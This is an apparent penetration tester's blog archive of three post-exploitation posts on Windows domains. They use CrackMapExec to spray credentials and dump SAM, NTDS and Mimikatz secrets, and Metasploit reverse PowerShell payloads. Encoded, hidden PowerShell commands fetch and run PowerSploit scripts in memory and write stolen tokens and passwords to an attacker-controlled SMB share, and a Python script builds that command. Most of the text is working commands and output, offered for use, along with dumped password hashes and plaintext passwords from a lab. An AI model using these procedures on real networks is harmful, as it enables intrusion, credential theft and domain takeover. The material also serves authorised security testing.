Archive for category Post Exploitation

WMI Post Exploitation

I’ve recently stumbled upon a script that has become my favorite post-exploitation tool. It’s multi-threaded, contains no local binaries, and no dropper binaries. It provides a plethora of functionality to escalate privileges on the network, all through WMI calls. The tool is CrackMapExec, written by byt3bl33d3r.

Imagine that we’ve compromised credentials on an internal assessment. CrackMapExec can easily be utilized to find where those credentials have elevated privileges. This command executes 100 threads attempting to login to all systems on the 192.168.81.0/24 range:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup -t 100 192.168.81.0/24
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup)
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [*] Windows 10.0 Build 10586 (name:WIN8-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Finding administrative access on one system, we can then run a hashdump, which may be able to be utilized in a pass-the-hash attack to other systems on the network:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --sam    
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Dumping SAM hashes (uid:rid:lmhash:nthash)
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27:::
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:e8dfb6d1552e2fc23a66e8d573abbdba:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN HomeGroupUser$:1007:aad3b435b51404eeaad3b435b51404ee:46e6eeed8d95245e068dfbec8a81ef40:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedUser:1012:aad3b435b51404eeaad3b435b51404ee:dea92d9004d55c23189754069eeec7fc:::

We can also scrape clear text credentials from memory:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --mimikatz
03-08-2016 12:40:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:40:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:40:56 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Executed command via WMIEXEC
03-08-2016 12:40:59 192.168.81.216 - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
03-08-2016 12:41:04 192.168.81.216 - - "POST / HTTP/1.1" 200 -
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            [+] Found plain text credentials (domain\user:password)
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\TrustedSec:GoatBah1!
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            [*] Saved Mimikatz's output to Mimikatz-192.168.81.216-2016-03-08_124104.log

Notice that all results are logged to the ./logs directory. We have a member of the “Domain Admins” group from Mimikatz, so lets retrieve hashes safely from NTDS.dit on the domain controller:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p GoatBah1! -d pwnt.com 192.168.81.10 --ntds drsuapi
03-08-2016 12:43:45 SMB 192.168.81.10:445 PWNT-DC    [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:pwnt.com)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    [+] Login successful pwnt.com\TrustedSec:GoatBah1!
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    [+] Dumping NTDS.dit secrets using the DRSUAPI method (domain\uid:rid:lmhash:nthash)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    PWNT-DC$:1001:aad3b435b51404eeaad3b435b51404ee:07a60a315af67d202aa52e846ee4fb27:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TEST$:1105:aad3b435b51404eeaad3b435b51404ee:4ab69c349bfaa599b46069f3d57dbe49:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TEST2$:1106:aad3b435b51404eeaad3b435b51404ee:3ce8a48ae2264366c6c0ce9b6155bab6:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    WIN7-SPOONMAN$:1109:aad3b435b51404eeaad3b435b51404ee:63c459c139c5bdeb4c404327261d75f1:::

These are just a couple of examples, but there is so much more functionality packed into this script. So check it out! Thanks byt3bl33d3r!

No Comments

Interactive PowerShell Sessions Within Meterpreter

In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session.

Example:

msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:444/
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ...
[*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400

meterpreter > shell
Process 2776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell
powershell
Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

Get-ExecutionPolicy


Any command that you type seems to disappear in the ether. Now, thanks to the hard work of
Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here.

To find the new payloads within Metasploit, simply search for “Interactive_Powershell”

msf payload(reverse_powershell) > search Interactive_Powershell

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   payload/cmd/windows/powershell_bind_tcp                      normal  Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                   normal  Windows Interactive Powershell Session, Reverse TCP
   payload/windows/powershell_bind_tcp                          normal  Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                       normal  Windows Interactive Powershell Session, Reverse TCP

Let’s try a “Reverse TCP” payload:

msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>Get-ExecutionPolicy
Bypass

This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use “Invoke-Expression” to run the tools directly in memory. I like to host them locally, as opposed to downloading the from the Internet.

PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")
PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName

UserName                                                                       
--------                                                                       
TrustedSec                                                                     
Administrator

Instead of loading modules from within an existing session, the payloads also allow you to configure modules before the session is created, by setting the “LOAD_MODULES” parameter.

Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting                                           Required  Description
   ----          ---------------                                           --------  -----------
   EXITFUNC      thread                                                    yes       Exit technique (accepted: seh, thread, process, none)
   LHOST         192.168.81.217                                            yes       The listen address
   LOAD_MODULES  http://192.168.81.217/PowerTools/PowerView/powerview.ps1  no        A list of powershell modules seperated by a comma to download over the web
   LPORT         444                                                       yes       The listen port

msf exploit(psexec_psh) > exploit 

[*] Loading 1 modules into the interactive PowerShell session
[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Get-NetForest


Name                  : pwnt.com
Sites                 : {Default-First-Site-Name}
Domains               : {pwnt.com}
GlobalCatalogs        : {pwnt-dc.pwnt.com}
ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC
                        =pwnt,DC=com}
ForestMode            : Windows2008R2Forest
RootDomain            : pwnt.com
Schema                : CN=Schema,CN=Configuration,DC=pwnt,DC=com
SchemaRoleOwner       : pwnt-dc.pwnt.com
NamingRoleOwner       : pwnt-dc.pwnt.com

You can also load multiple modules all at once by providing a list separated by commas. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules, I simply use “find” to display all PowerShell scripts recursively.

root@kali:~# find /var/www -name "*.ps1"
/var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
/var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
/var/www/PowerSploit/Recon/Invoke-Portscan.ps1
/var/www/PowerSploit/Recon/Get-ComputerDetails.ps1
/var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
/var/www/PowerSploit/Recon/Get-HttpStatus.ps1
/var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
/var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
/var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
/var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
/var/www/PowerSploit/Exfiltration/Out-Minidump.ps1
/var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1
/var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
/var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1
/var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1
/var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
/var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
/var/www/PowerSploit/ScriptModification/Remove-Comments.ps1
/var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
/var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1
/var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
/var/www/PowerTools/PowerBreach/PowerBreach.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1
/var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
/var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1
/var/www/PowerTools/PowerUp/PowerUp.ps1
/var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
/var/www/PowerTools/PowerView/functions/Get-NetShare.ps1
/var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
/var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1
/var/www/PowerTools/PowerView/functions/Get-Net.ps1
/var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1
/var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
/var/www/PowerTools/PowerView/powerview.ps1

To replace “/var/www” with your web host, use “sed”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1
http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1
http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1
http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
http://192.168.81.217/PowerTools/PowerView/powerview.ps1

To create a comma separated list, use “tr”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'|sed 's_/var/www_https://192.168.81.217_' |tr '\n' ','
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,

Copy/paste that output into your “LOAD_MODULES” parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!!

No Comments

Account Hunting for Invoke-TokenManipulation

I’ve been searching quite a while now for the best way to search for domain admin tokens, once admin rights are attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that have a domain admin kerberos security token still loaded in memory. There are a couple of “Token_Hunter” post modules, but you need to have a shell on the systems to run them, which can take a long time to establish, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.

The first article is from Chris Campbell posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnageHarmJoy

To setup the environment, I first downloaded PowerSploit to my apache directory:

cd /var/www/
git clone https://github.com/mattifestation/PowerSploit.git

Then configured Samba with an open share to capture the output files:

nano /etc/samba/smb.conf
[loot$]
comment = Loot
path = /root/loot
browseable = yes
read only = no
guest ok = yes
public = yes

Then create the folder and grant full permissions. I created a folder named “tokens” under “loot”.

Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:

IEX (New-Object Net.WebClient).DownloadString(“http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt

This will download “Invoke-TokenManipulation.ps1” from my web host, execute it within memory to enumerate tokens, and pipe the output to my SMB share into a file named as the computer.

Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.

msf auxiliary(psexec_command) > info

       Name: Microsoft Windows Authenticated Administration Utility
     Module: auxiliary/admin/smb/psexec_command
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis @R3dy__ <rdavis@accuvant.com>

Basic options:
  Name                  Current Setting  Required  Description
  ----                  ---------------  --------  -----------
  COMMAND                                yes       The command you want to execute on the remote host
  RHOSTS                192.168.81.10    yes       The target address range or CIDR identifier
  RPORT                 445              yes       The Target port
  SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                   no        The service display name
  SERVICE_NAME                           no        The service name
  SMBDomain             pwnt.com         no        The Windows domain to use for authentication
  SMBPass               GoatBah1!        no        The password for the specified username
  SMBSHARE              C$               yes       The name of a writeable share on the server
  SMBUser               TrustedSec       no        The username to authenticate as
  THREADS               255              yes       The number of concurrent threads
  WINPATH               WINDOWS          yes       The name of the remote Windows directory

Description:
  This module uses a valid administrator username and password to 
  execute an arbitrary command on one or more hosts, using a similar 
  technique than the "psexec" utility provided by SysInternals. Daisy 
  chaining commands with '&' does not work and users shouldn't try it. 
  This module is useful because it doesn't need to upload any binaries 
  to the target machine.

References:
  http://cvedetails.com/cve/1999-0504/
  http://www.osvdb.org/3106
  http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
  http://sourceforge.net/projects/smbexec/
  http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA
command => powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA
msf auxiliary(psexec_command) > run

[*] 192.168.81.10:445 - Executing the command...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] checking if the file is unlocked
[*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.81.10:445 - Getting the command output...
[*] 192.168.81.10:445 - Command finished with no output
[*] 192.168.81.10:445 - Executing cleanup...
[-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.10:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then, just egrep the files to enumerate any domain admins.

root@trustedsec4-lin:~/loot/tokens# egrep -i 'trustedsec|admin' * /dev/null
PWNT-DC.txt:Username : TrustedSec

All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.

The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:

root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null
PWNT-DC.txt:User Name : TrustedSec
PWNT-DC.txt-Domain : PWNT
PWNT-DC.txt-SID : S-1-5-21-1458926743-1222556689-571800001-1000
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* NTLM : 918d38906649503fde8a641dbd87d857
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* Password : GoatBah1!

Full script source provided below. Happy Hunting!

TokenHunter.py

#!/usr/bin/env python

# This download "Invoke-TokenManipulation.ps1" from the attacker's webhost,
# then execute the script in memory and pipe its output ot the attacker's SMB share
# "\\loot$\tokens\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# Script Dependency
# https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration
#
# TrustedSec

import base64

attacker_ip = "<put your IP here>"

# Main guts
def main():
  powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\tokens\\$env:computername.txt"
